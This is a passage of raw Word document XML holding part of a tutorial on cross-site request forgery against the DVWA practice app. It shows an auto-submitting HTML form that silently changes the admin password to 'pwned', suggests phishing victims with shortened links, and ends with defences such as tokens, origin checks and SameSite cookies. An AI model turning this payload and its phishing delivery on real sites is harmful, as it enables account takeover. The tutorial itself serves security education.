        <w:t xml:space="preserve"> tag, we can make this function execute when the page is loaded. We can then add a new value to the password and password confirmation fields, as well as making those fields hidden. Finally, replace the pound sign with the correct URL, and when this page is loaded, the password will be changed.</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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:proofErr w:type="gram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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>head</w:t>
      </w:r>
      <w:proofErr w:type="gram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&lt;script language="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>javascript</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3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>autoSubmit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>() {</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 xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.myForm.submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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&lt;/script&gt;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&lt;/head&gt;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 xml:space="preserve">&lt;body </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>autoSubmit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gram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&lt;form name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>myForm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" action="http://172.16.1.102/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/vulnerabilities/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/" method="POST"&gt;    New </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>br</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&lt;input type="hidden" AUTOCOMPLETE="off" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_new</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" value="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pwned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>br</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Confirm new password: &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>br</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&lt;input type="hidden" AUTOCOMPLETE="off" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" value="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pwned</w:t>
      </w:r>
      <w:proofErr w:type="spell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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;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&lt;input type="submit" value="Change" name="Change"&gt;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&lt;/form&gt;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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="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3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3Change the Admin Password</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Now we are ready to carry out our attack, which can be accomplished in numerous ways using social engineering or phishing techniques. All we need to do is to get the victim to load this page. For example, we can use a URL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shortener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Bitly</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Goo.gl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to disguise the link.</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To demonstrate that this was successful, once the page is loaded, "Inspect Element" can be used to view the POST request. We can see that the parameters contain the new password that we crafted earlier:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7810500" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="https://img.wonderhowto.com/img/13/63/63670623939324/0/manipulate-user-credentials-with-csrf-attack.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13/63/63670623939324/0/manipulate-user-credentials-with-csrf-attack.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10500" cy="2028825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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From here, the admin is essentially locked out of the account, and since we set the new password, we can log in as administrator. Depending on the type of web application this is, we can now do anything from modifying user information to leveraging this account to </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>further attack other systems</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>How to Prevent CSRF Attacks</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There are many ways to prevent CSRF attacks successfully. Many </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="003D3E6A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>frameworks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, Struts, Ruby on Rails, and others have built-in functionality to guard against CSRF.</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One of the best ways to prevent this type of attack is to verify header origins. The origin header can be used to determine if where the source origin is indeed where the request is coming from. The target origin is a little harder to identify since there are usually one or more proxies sitting in front of the application server. In these cases, the Host header can be used to verify the target origin, as well as the X-Forwarded-Host header, although it is possible for this to be forged.</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Another method to defend against CSRF attacks involves the use of tokens. Synchronizer Tokens can be used to validate server-side requests by assigning a random token for any state-changing activity. If storing a CSRF token in a session state isn't possible, other techniques such as double-cookie submission, encrypted token pattern, and custom request headers can be utilized.</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 xml:space="preserve">Sometimes it is easier to involve the user in preventing CSRF. A challenge-response method would require the user to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reauthenticate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or solve a CAPTCHA for high-risk requests. Another </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">alternative to user interaction is to set the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie attribute, which prevents the cookie from being sent for cross-site requests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Another Method: CSRF with OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3E6A" w:rsidRPr="003D3E6A" w:rsidRDefault="003D3E6A" w:rsidP="003D3E6A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cross-site request forgery can have a severe impact due to the way it exploits an authenticated user's session. While theft of information is not a concern with this attack, CSRF can lead to other devastating consequences such as credential manipulation and unauthorized financial transactions. In the next article, we'll take a look at the popular web application scanner OWASP ZAP and configure it to perform an automated CSRF attack.</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D6061"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59D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6A"/>
    <w:rsid w:val="003D3E6A"/>
    <w:rsid w:val="00582D8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92D11-4188-407E-98F4-6286CAE4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3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E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E6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3E6A"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="003D3E6A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003D3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3D3E6A"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="003D3E6A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003D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E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3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878796">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1927567669">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="110902482">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="857349502">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="258874971">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
